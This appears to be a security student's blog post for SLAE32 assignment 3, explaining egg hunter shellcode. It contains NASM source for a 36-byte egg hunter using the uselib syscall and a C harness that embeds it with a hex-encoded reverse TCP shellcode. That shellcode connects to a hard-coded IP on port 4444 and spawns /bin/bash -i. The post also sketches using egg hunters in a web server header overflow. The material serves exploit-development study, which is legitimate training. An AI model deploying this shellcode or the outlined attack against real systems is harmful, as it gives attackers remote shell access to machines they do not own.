Skip to main content

SLAE32 - Assignment 3

This is part three (3) in a seven (7) part series for the SecurityTube Linux Assembly Expert 32-bit certification challenge. You can find part one (1) here: Part 1 - Assignment 1.

You can read part two (2) here: Part 2 - Assignment 2.

In assignment three (3), we were given the following instructions:

  1. Study about the Egg Hunter shellcode
  2. Create a working demo of the Egg Hunter
  3. Should be configurable for different payloads

The full code for this assignment can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/assignment-3.

Supplemental scripts can be found here:
https://github.com/blu3gl0w13/SLAE32/tree/master/scripts

I must say, I really enjoyed this assignment. I had some experience with Egg Hunters during the Pentesting with Kali (PWK) course offered by Offensive Security. With my new found assembly skills though, this offered a chance to really understand some of the assembly instructions being used. For this assignment I relied heavily on the following articles:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

https://www.exploit-db.com/docs/18482.pdf

http://www.fuzzysecurity.com/tutorials/expDev/4.html


I would encourage you to read Skape's paper. It's pretty much the go to for Egg Hunter shellcode. I actually used one of his Egg Hunters with a different system call to complete this assignment. Let's break down this script. Similar to Skape's paper (section 3.2.1 - ACCESS system call), we find a system call that returns the error we're looking for 0xf2 so that we can safely dereference any pointers/areas of memory and do our best to avoid crashing the system. I found USELIB only requires one parameter and it returns the error value we're looking for. Let's take a look at the man page.




I modified the code from Skape's white paper so it would run on Kali using nasm. I needed to modify the JZ, and JNZ instructions so that they jumped to the correct label incrementer if a match wasn't found. The original code jumped back to the beginning + 0x7 upon unsuccessful match. We can see the original code plus modifications below.

global _start

section .text


_start:

 ; This is our egghuter
 ; it needs to search for 
 ; 2 consecutive instances
 ; of our 'hack' string
 ; and then jump into, and execute
 ; our reverse TCP shellcode
 ;
 ; we'll try this out with the uselib syscall 86
 ; and hope we can find and execute our shell
 ; in the data section

     xor edx, edx              ; initialize the registers

page_alignment:
     or dx, 0xfff              ; helps set up for page size (0xfff = 4095)

incrementer:
     inc edx                   ; increase edx by 1

hunter:
     lea ebx, [edx + 4]        ; put the address of edx plus 4 bytes 
                               ; into ebx for the syscall
     xor eax, eax              ; clear out eax
     mov al, 0x56              ; #define __NR_uselib       86 (0x56) 
     int 0x80                  ; call it
     cmp al, 0xf2              ; compare the return value in eax
     jz page_alignment         ; short jump to next page if ZF set
     mov eax, 0x6861636b       ; copy our comparison string into eax
     mov edi, edx              ; mov our value in edx into edi
     scasd                     ; compare eax with dword at edi 
                               ; (in other words, check to see if we 
                               ; have 2 consecutive strings)
     jnz incrementer           ; short jump if ZF not set (no match)
     scasd                     ; make the eax comparison again (match, compare again)
     jnz incrementer           ; short jump if ZF not set (no match)
     jmp edi                   ; we found a match! pwnage!!! 


The next part of this assignment was rather funny because I was having trouble thinking through how I would put my shellcode with egg to be hunted. Then I looked in shellcode.c provided in some of the example scripts in order for us to test our shellcode throughout the class. Then it dawned on me. Duh, I should be able to just create another unsigned character array. The array will get put into memory, and voila, we'll execute our egg hunter to search memory for our egg x 2 and actual shellcode. Perfect! So, we define our EGG as a preprocessor macro to make it easy to configure our EGG value as necessary. All we need to do then is to define a pointer to our function (*ret)() and assign our EGGHUNTER to it, and then finally call the function.


#include <stdio.h>
#include <string.h>

#define EGG "\x68\x61\x63\x6b"

unsigned char egghunter[] = \
"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04"
"\x31\xc0\xb0\x56\xcd\x80\x3c\xf2\x74\xed\xb8"
EGG
"\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";

unsigned char shellcode[] = EGG EGG \
"\x31\xc0\x31\xdb\x6a\x06\x6a\x01\x6a\x02\xb0"
"\x66\xb3\x01\x89\xe1\xcd\x80\x89\xc7\xeb\x5b"
"\x5e\x31\xc0\x31\xc9\xff\x36\x66\xff\x76\x04"
"\xb0\x02\x66\x50\x89\xe0\x6a\x10\x50\x57\x31"
"\xc0\xb0\x66\x31\xdb\xb3\x03\x89\xe1\xcd\x80"
"\x31\xdb\x31\xc9\x89\xfb\xb0\x3f\xcd\x80\x41"
"\xb0\x3f\xcd\x80\x41\xb0\x3f\xcd\x80\x31\xc0"
"\x50\x68\x62\x61\x73\x68\x68\x2f\x2f\x2f\x2f"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x66\x68\x2d"
"\x69\x89\xe6\x50\x56\x53\x89\xe1\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xa0\xff\xff\xff\xc0\xa8\xfa"
"\x81\x11\x5c"; 

int main()
{

 printf("Shellcode Length:  %d\n", strlen(egghunter));

 int (*ret)() = (int(*)())egghunter;

 ret();

}


If everything works, we should get get our EXECVE /bin/bash -i to work. One important note, the egghunter is only 36 bytes, not the entire shellcode.




Ok, so practically speaking, where can an egg hunter like this come in handy? Well, let's consider a few important details about egg hunter shellcode. One, you have limited space in your initially compromised buffer. Two, you need to have an alternate area of memory to inject your EGG x 2 along with your shellcode and that memory space must have enough room for two (2) eggs and the shellcode. One situation where I've successfully used an egg hunter before is within an Apache vulnerability. I'll let you search for it yourself but think about why a web server would make a great candidate. Say you have an overflow situation in an HTTP header but the size of the buffer isn't big enough for your shellcode, and attempts to extend the buffer space fails miserably. If we were to use an egg hunter in such an exploit, where could we put our eggs and shellcode? If we examine how a web server handles, say, POST requests and accompanying data, we would learn this is a great place for our shellcode and eggs.

Next: Part 4 - Assignment 4


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-744

Comments

Popular posts from this blog

SLAE/SLAE64 Course Review

After recently finishing both the SLAE (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html) and SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html) courses available through SecurityTube Training, and earning both certifications, I thought I would write a review of the training itself. Personally, I chose these course as a way to learn Assembly in preparation for the Crack The Perimeter (CTP) course and OSCE certification. After taking the Pentesting With Kali (PWK) class and earning the OSCP, I knew I needed to fill some gaps in my knowledge, and specifically with C and Assembly programming. Seeing that there aren't many training offerings that aim to teach Assembly specific to penetration testing and shellcoding, I gave SLAE a try.

  If you don't care about the certification itself, you can obtain all of SecurityTube's videos for a small monthly fee through Pentes…

SLAE64 - Assignment 1

Following completion of the SLAE32 course (http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/index.html), I decided to take advantage of the Pentester Academy account we have at work to continue the training with SLAE64 (http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html). So, we'll delve into each assignment like we did before and because it's part of the certification challenge.

Assignment 1 requirements are as follows:

Create a Shell_Bind_TCP shellcodeBinds to a portNeeds a "Passcode"If Passcode is correct then Execs ShellRemove 0x00 from the Bind TCP Shellcode discussed

PWK and the OSCP Review

Back in 2014 I started down the Pentesting With Kali (PWK) course about a month after passing the CISSP exam, for which I self studied for about 4 months. What can I say, I was a glutton for punishment but it was well worth it. I started off with 90 days, but due to a crazy work schedule, wound up extending it another 30 for a total of 120 days of lab access. I'm not as young as I would like to think I am and have other important responsibilities as Dad and Husband which I consider "Priority 1". So, my time to study, perform the homework assignments, go through the modules, videos, and lab work were limited to 2 hours in the morning before work (typically 5am until 7am), and then again for a few hours after everyone was asleep in the house (typically 9pm until 11pm or Midnight). Weekends I could usually spend up to 6 hours on Saturdays and Sundays studying which helped tremendously.

Other people have already done a great job at reviewing the PWK course and the OSCP chall…